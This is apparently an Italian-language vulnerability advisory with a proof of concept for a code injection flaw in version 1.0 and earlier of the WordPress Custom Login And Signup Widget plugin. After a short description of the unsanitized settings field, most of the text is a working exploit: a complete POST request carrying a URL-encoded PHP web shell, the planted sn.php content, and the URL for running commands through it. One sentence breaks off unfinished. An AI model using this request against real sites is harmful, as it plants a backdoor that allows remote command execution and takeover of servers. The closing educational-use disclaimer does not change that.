
WordPress Custom Login And Signup Widget Plugin <= 1.0 è vulnerabile all'esecuzione arbitraria di codice
La vulnerabilità Controllo improprio della generazione di codice ('Code Injection') in bitto.Kazi Custom Login And Signup Widget consente l'esecuzione arbitraria di codice PHP da parte di utenti amministratori autenticati.
Questo problema riguarda tutte le versioni fino alla 1.0 inclusa.
🔥 Punteggio Base: 9.1 (CRITICO)
ID CWE: CWE-94 – Controllo improprio della generazione di codice ('Code Injection')
Il plugin consente agli amministratori di modificare il contenuto di sn.php tramite il campo Nome del mittente nella pagina delle impostazioni.
L'input fornito dall'utente viene scritto direttamente in un file PHP senza sanitizzazione o validazione.
Di conseguenza, qualsiasi codice PHP fornito nel parametro text verrà archiviato in un file PHP ed eseguito a seguito di una richiesta diretta, consentendo .
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (inclusione configurazione plugin)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
Dopo un'iniezione riuscita, accedervi direttamente per eseguire comandi tramite:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php.Questo progetto è creato solo a scopo didattico e di ricerca.
Qualsiasi utilizzo delle informazioni fornite è a proprio rischio.
L'autore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo contenuto.